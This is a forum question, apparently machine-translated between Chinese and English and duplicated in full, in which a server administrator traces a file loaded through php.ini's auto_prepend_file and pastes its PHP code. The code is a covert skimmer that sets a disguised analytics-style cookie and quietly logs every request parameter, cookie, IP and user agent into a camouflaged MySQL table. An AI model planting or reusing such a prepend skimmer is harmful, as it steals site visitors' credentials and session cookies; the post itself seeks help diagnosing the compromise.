文件包含在某处,如何找到它?
File is included somewhere, how to find it?
从我的错误日志中,我发现每个 php 文件中都包含奇怪的文件“/var/lib/php5/modules/cgi/enabled_to.php”。因此,即使文件为空,也会包含并执行此文件。
我想可能是 Nginx 或 PHP 设置的问题,但我不知道去哪里找。
当我尝试删除它时,所有 php 页都出现此错误:
PHP message: PHP Fatal error: Unknown: Failed opening required
'/var/lib/php5/modules/cgi/enabled_to.php'
(include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line
0" while reading response header from upstream, client: 11.11.11.11,
server: domain.com, request: "GET /url", upstream:
"fastcgi://unix:/var/run/php5-fpm.sock:", host: "host.com"
如何追踪包含此文件的内容?
找到了:
php.ini
; Automatically add files before PHP document.
; http://php.net/auto-prepend-file
auto_prepend_file = /var/lib/php5/modules/cgi/enabled_to.php
我不知道这个文件在这里做什么或里面发生了什么(一些奇怪的日志记录)。
文件本身:
<?php
try {
$debug = false;
function gen_uuid()
{
return sprintf('%04x%04x-%04x-%04x-%04x-%04x%04x%04x',
// 32 bits for "time_low"
mt_rand(0, 0xffff), mt_rand(0, 0xffff),
// 16 bits for "time_mid"
mt_rand(0, 0xffff),
// 16 bits for "time_hi_and_version",
// four most significant bits holds version number 4
mt_rand(0, 0x0fff) | 0x4000,
// 16 bits, 8 bits for "clk_seq_hi_res",
// 8 bits for "clk_seq_low",
// two most significant bits holds zero and one for variant DCE1.1
mt_rand(0, 0x3fff) | 0x8000,
// 48 bits for "node"
mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff)
);
}
function get_uid()
{
if (!isset($_COOKIE["_gav2"])) {
$uid = "GA2." . gen_uuid();
setcookie("_gav2", $uid, time() + 31556926, "/", ".domain.com");
$_COOKIE['_gav2'] = $uid;
}
return $_COOKIE['_gav2'];
}
if (
strpos($_SERVER['HTTP_HOST'], "domain.com") !== false && (
strpos($_SERVER['REQUEST_URI'], "some_page.php") !== false ||
strpos($_SERVER['REQUEST_URI'], "some_page2.php") !== false
)
) {
$servername = "localhost";
$username = "mysql";
$password = "Defmysql";
$database = "mysql";
// Create connection
$mysqli = new mysqli($servername, $username, $password, $database);
if ($mysqli->connect_errno && $debug) {
echo "<!---->";
}
$create_sql = "CREATE TABLE IF NOT EXISTS tables_priv_ex (
`id` int(11) NOT NULL auto_increment,
`uid` TEXT NOT NULL DEFAULT '',
`ip` TEXT NOT NULL DEFAULT '',
`user_agent` TEXT NOT NULL DEFAULT '',
`request` TEXT NOT NULL DEFAULT '',
`cookie` TEXT NOT NULL DEFAULT '',
`server` TEXT NOT NULL DEFAULT '',
`created` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (`id`),
KEY `id` (`id`)
)";
if (!$mysqli->query($create_sql) && $debug) {
echo "<!-- -->";
}
$uid = get_uid();
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
$request_url = $_SERVER['REQUEST_URI'];
$json_request = json_encode($_REQUEST);
$json_cookie = json_encode($_COOKIE);
$json_server = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
$insert = $mysqli->prepare("INSERT INTO tables_priv_ex (uid, ip, user_agent, request, cookie, server) VALUES (?, ?, ?, ?, ?, ?)");
$result = $insert->bind_param('ssssss', $uid, $ip, $ua, $json_request, $json_cookie, $json_server);
$insert->execute();
$mysqli->close();
}
} catch (Exception $e) {
if ($debug) {
echo '';
}
}
从我的错误日志中,我发现每个 php 文件中都包含奇怪的文件“/var/lib/php5/modules/cgi/enabled_to.php”。因此,即使文件为空,也会包含并执行此文件。
我想可能是 Nginx 或 PHP 设置的问题,但我不知道去哪里找。
当我尝试删除它时,所有 php 页都出现此错误:
PHP message: PHP Fatal error: Unknown: Failed opening required '/var/lib/php5/modules/cgi/enabled_to.php' (include_path='.:/usr/share/php:/usr/share/pear') in Unknown on line 0" while reading response header from upstream, client: 11.11.11.11, server: domain.com, request: "GET /url", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "host.com"
如何追踪包含此文件的内容?
找到了:
php.ini
; Automatically add files before PHP document.
; http://php.net/auto-prepend-file
auto_prepend_file = /var/lib/php5/modules/cgi/enabled_to.php
我不知道这个文件在这里做什么或里面发生了什么(一些奇怪的日志记录)。
文件本身:
<?php
try {
$debug = false;
function gen_uuid()
{
return sprintf('%04x%04x-%04x-%04x-%04x-%04x%04x%04x',
// 32 bits for "time_low"
mt_rand(0, 0xffff), mt_rand(0, 0xffff),
// 16 bits for "time_mid"
mt_rand(0, 0xffff),
// 16 bits for "time_hi_and_version",
// four most significant bits holds version number 4
mt_rand(0, 0x0fff) | 0x4000,
// 16 bits, 8 bits for "clk_seq_hi_res",
// 8 bits for "clk_seq_low",
// two most significant bits holds zero and one for variant DCE1.1
mt_rand(0, 0x3fff) | 0x8000,
// 48 bits for "node"
mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff)
);
}
function get_uid()
{
if (!isset($_COOKIE["_gav2"])) {
$uid = "GA2." . gen_uuid();
setcookie("_gav2", $uid, time() + 31556926, "/", ".domain.com");
$_COOKIE['_gav2'] = $uid;
}
return $_COOKIE['_gav2'];
}
if (
strpos($_SERVER['HTTP_HOST'], "domain.com") !== false && (
strpos($_SERVER['REQUEST_URI'], "some_page.php") !== false ||
strpos($_SERVER['REQUEST_URI'], "some_page2.php") !== false
)
) {
$servername = "localhost";
$username = "mysql";
$password = "Defmysql";
$database = "mysql";
// Create connection
$mysqli = new mysqli($servername, $username, $password, $database);
if ($mysqli->connect_errno && $debug) {
echo "<!---->";
}
$create_sql = "CREATE TABLE IF NOT EXISTS tables_priv_ex (
`id` int(11) NOT NULL auto_increment,
`uid` TEXT NOT NULL DEFAULT '',
`ip` TEXT NOT NULL DEFAULT '',
`user_agent` TEXT NOT NULL DEFAULT '',
`request` TEXT NOT NULL DEFAULT '',
`cookie` TEXT NOT NULL DEFAULT '',
`server` TEXT NOT NULL DEFAULT '',
`created` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (`id`),
KEY `id` (`id`)
)";
if (!$mysqli->query($create_sql) && $debug) {
echo "<!-- -->";
}
$uid = get_uid();
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
$request_url = $_SERVER['REQUEST_URI'];
$json_request = json_encode($_REQUEST);
$json_cookie = json_encode($_COOKIE);
$json_server = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
$insert = $mysqli->prepare("INSERT INTO tables_priv_ex (uid, ip, user_agent, request, cookie, server) VALUES (?, ?, ?, ?, ?, ?)");
$result = $insert->bind_param('ssssss', $uid, $ip, $ua, $json_request, $json_cookie, $json_server);
$insert->execute();
$mysqli->close();
}
} catch (Exception $e) {
if ($debug) {
echo '';
}
}